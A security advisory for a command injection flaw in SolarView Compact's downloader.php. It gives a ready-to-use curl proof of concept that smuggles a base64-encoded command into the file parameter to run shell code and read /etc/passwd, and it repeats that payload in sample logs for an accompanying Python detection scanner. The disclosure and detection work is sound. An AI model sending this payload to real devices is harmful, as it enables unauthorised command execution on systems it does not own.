There is a command injection vulnerability in SolarView Compact through 6.00. Attackers can execute commands by bypassing internal restrictions through downloader.php.
- SolarView Compact
- SolarView Compact <=ver 6.00
curl 'http://example.com/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg==|base64%20-d|bash%00.zip' | grep 'root:.*:0:0'
Commands can be injected through the file parameter of the downloader.php page, bypassing its internal restrictions.
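To check whether a device has received requests of this shape, the following added example (not part of the original advisory) scans web access log lines for downloader.php requests whose decoded file parameter contains shell metacharacters or a NUL byte. The combined log format, the function names and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Request line of a combined-format access log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Shell metacharacters and control bytes that a download file name never needs
SUSPICIOUS_RE = re.compile(r"[;|&`$<>(){}\x00\r\n]")

def suspicious_file_values(target):
    """Decoded `file` values of a downloader.php request that look like injection."""
    try:
        parts = urlsplit(target)
    except ValueError:
        return []
    if not parts.path.lower().endswith("/downloader.php"):
        return []
    hits = []
    # Split by hand: parse_qs treats ';' as a separator on older Python versions
    for pair in parts.query.split("&"):
        key, _, value = pair.partition("=")
        if unquote(key) == "file" and SUSPICIOUS_RE.search(unquote(value)):
            hits.append(unquote(value))
    return hits

def scan(lines):
    """Return (client, decoded value) for every suspicious request in the log."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if m:
            findings += [(m.group(1), v) for v in suspicious_file_values(m.group(2))]
    return findings

# Constructed sample log lines (documentation addresses, not real traffic)
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Sep/2022:10:00:00 +0000] "GET /downloader.php?file=report.zip HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Sep/2022:10:00:05 +0000] "GET /downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg==|base64%20-d|bash%00.zip HTTP/1.1" 200 1843',
    '192.0.2.10 - - [01/Sep/2022:10:00:09 +0000] "GET /index.php?file=a;b HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"{client}: file={value!r}")
```

Only requests recorded with their query string are covered; a file value sent in a POST body does not appear in a standard access log.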